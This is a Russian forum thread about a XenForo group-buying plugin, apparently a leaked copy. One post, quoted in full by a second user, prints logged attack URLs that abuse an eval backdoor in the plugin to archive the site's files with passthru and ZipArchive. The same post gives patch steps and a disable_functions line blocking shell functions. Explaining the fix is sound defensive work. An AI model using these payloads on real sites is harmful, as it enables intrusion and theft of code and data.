Плагин Esthetic Collaborative Shopping 1.1.6

[SOUL]

Пользователь SOUL разместил новый ресурс:

Esthetic Collaborative Shopping - Дополнение для организации и проведения совместных покупок.

ZB0owPjuMcEYEJEPN

Актуально для версии 1.0.7 и выше

1. Введение
2. Требования
3. Инструкция по установке
4. Настройка дополнения

1. Введение
Дополнение Esthetic Collaborative Shopping служит для предоставления пользователям Вашего сайта возможности совершать совместные покупки(в дальнейшем СП) продуктов, объединяться в группы для получения скидок при покупке товаров в интернет-магазинах. При этом, дополнение позволяет в автоматическом...

Узнать больше об этом ресурсе...

 

[Пелевин]

А есть ли инструкция, где искать стучалки?

 

[SOUL]

Вообще здесь об этом говорилось http://xenforotest.ru/threads/hide-esthetic-extended-bb-codes-v-1-0-4-su-1-ot-viodele-mnogofunkcionalnyj-i-ochen-udobnyj-xajd.14/

И ещё вот инфа попалась по этому поводу:

Форум сливается примерно такими запросами:

passthru() has been disabled for security reasons
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
  ["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
  ["_GET"] => array(2) {
  ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
  ["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
  }
  ["_POST"] => array(0) {
  }
}

RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
  ["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
  ["_GET"] => array(2) {
    ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
    ["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
  }
  ["_POST"] => array(0) {
  }
}

Теперь перейдем к лечению дырок на примере плагина хайда от esthetic
Открываем файл: library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:

case '54626eee0bcb90ab43c7917eb49f2344'

и удаляем вторую строку

case 'a6746afee9fa4e6e4901943d47f272bf''

либо генерируем свой md5 код и вставлем вместо этих двух. Остальное плагины латаются по аналогии.

Потом идем в файл php.ini который находится на вашем сервере,либо хостинге и ищем
строчку disable_functions и заменяем на:

disable_functions="popen,exec,system,passthru,proc_open,shell_exec

Информация отсюда: programmisty.net

 

[MAX3000]

Вообще здесь об этом говорилось http://xenforotest.ru/threads/hide-esthetic-extended-bb-codes-v-1-0-4-su-1-ot-viodele-mnogofunkcionalnyj-i-ochen-udobnyj-xajd.14/

И ещё вот инфа попалась по этому поводу:

Форум сливается примерно такими запросами:

passthru() has been disabled for security reasons
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
  ["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
  ["_GET"] => array(2) {
  ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
  ["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
  }
  ["_POST"] => array(0) {
  }
}

RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
  ["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
  ["_GET"] => array(2) {
    ["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
    ["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
  }
  ["_POST"] => array(0) {
  }
}

Теперь перейдем к лечению дырок на примере плагина хайда от esthetic
Открываем файл: library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:

case '54626eee0bcb90ab43c7917eb49f2344'

и удаляем вторую строку

case 'a6746afee9fa4e6e4901943d47f272bf''

либо генерируем свой md5 код и вставлем вместо этих двух. Остальное плагины латаются по аналогии.

Потом идем в файл php.ini который находится на вашем сервере,либо хостинге и ищем
строчку disable_functions и заменяем на:

disable_functions="popen,exec,system,passthru,proc_open,shell_exec

Информация отсюда:

Спасибо за детальное описание!

 

[kvestel]

Потом идем в файл php.ini который находится на вашем сервере,либо хостинге

А где php.ini найти можно? где он находится? примерный путь,папки.Все перерыл,найти не могу.

 

[SOUL]

А где php.ini найти можно? где он находится? примерный путь,папки.Все перерыл,найти не могу.

Нашла мануал
Для того, чтобы узнать путь, где размещается файл php.ini, нужно сделать следующее:

1) Создаем файл info.php;

2) В него помещаем следующий код: <?php phpinfo(); ?>;

3) Размещаем этот файл в корне сайта или корневой папки;

4) Запускаем этот файл, через браузер: например

http://site.ru/info.php

Вот и все, перед вами будет выведена полная конфигурация php. В строке «Loaded Configuration File» будет указан путь к вашему файлу php.ini.

 

[kvestel]

Так я делал,указывает путь usr/local/php5/php.ini На денвере это все есть,а вот на хостинге нету.

 

[SOUL]

Да, а вообще рекомендуют к хостеру обратиться по этому поводу.

 

[X-Oleg]

В Дебиан: /etc/php5/php.ini

В CentOS: /etc/php.ini

 

[kvestel]

А обязательно менять php.ini ? смены кодов не хватит? Мне просто хостер ответил что пользователям этот файл не доступен и сменить он не может,поскольку эта функция заблокирована в целях безопасности.

 

[X-Oleg]

А обязательно менять php.ini ? смены кодов не хватит? Мне просто хостер ответил что пользователям этот файл не доступен и сменить он не может,поскольку эта функция заблокирована в целях безопасности.

Смены кодов хватит, эта опция отключает потенциально-опасные функции в php, поэтому и необязательно:

disable_functions="popen,exec,system,passthru,proc_open,shell_exec".

Но проблема, если эти функции понадобятся то-что ? Да и сомневаюсь что это как-то защитит от бекдуров !

 

[hummer777111]

от архива пароль не подскажете?

 

[SOUL]

от архива пароль не подскажете?

Ты его сам сможешь увидеть, когда напишешь 35 постов и получишь 7 симпатий.

 

[hummer777111]

Ты его сам сможешь увидеть, когда напишешь 35 постов и получишь 7 симпатий.

уже нашел протестил и разочаровался думал хоть в
1.1.2
будет индекатор обратного отсчета времени начала (старта сбора средств как в 1,1,3) а там то же самое что и 1,0,8 я расстроился (

 

[hummer777111]

уже нашел протестил и разочаровался думал хоть в
1.1.2
будет индекатор обратного отсчета времени начала (старта сбора средств как в 1,1,3) а там то же самое что и 1,0,8 я расстроился (

к тому-же заметил что наши модули кардинально отличаются от знаменитого сКладчика , например кнопка записаться убрано в сторону в право, даты отсчета красным цветом тоже нет , много лишней информации мешающей простым пользователям типа комиссия орга , комиссия ресурса.

 

[hummer777111]

Ты его сам сможешь увидеть, когда напишешь 35 постов и получишь 7 симпатий.

пожалуйста подскажите можно найти нам версию 1,1,3 для проверки?

 

[SOUL]

пожалуйста подскажите можно найти нам версию 1,1,3 для проверки?

Мне обещали версию 1.1.3, но, к сожалению, не все и не всегда сдерживают свои обещания.

Если мне удастся раздобыть версию 1.1.3, сразу выложу её здесь...

 

[hummer777111]

Мне обещали версию 1.1.3, но, к сожалению, не все и не всегда сдерживают свои обещания.

Если мне удастся раздобыть версию 1.1.3, сразу выложу её здесь...

1,1,3? вауу классно!! как появится главное про меня не забудьте я тоже буду ждать с нетерпением великим

 

[pereval103]

После выхода 1.5 бета, произошли изменения в обьявление , и данный модуль перестал отображать складчины.
Кто столкнулся с этой проблемой и как ее решить ,дабы вернуть эти обьявления.

 

[JiM]

Прошу прощения, а это правильно, что кнопка "Скачать" в шапке поста доступна всем подряд?
Я конечно не против такой халявы, но обычно для скачивания нужно набрать хотя бы какое-то количество сообщений или лайков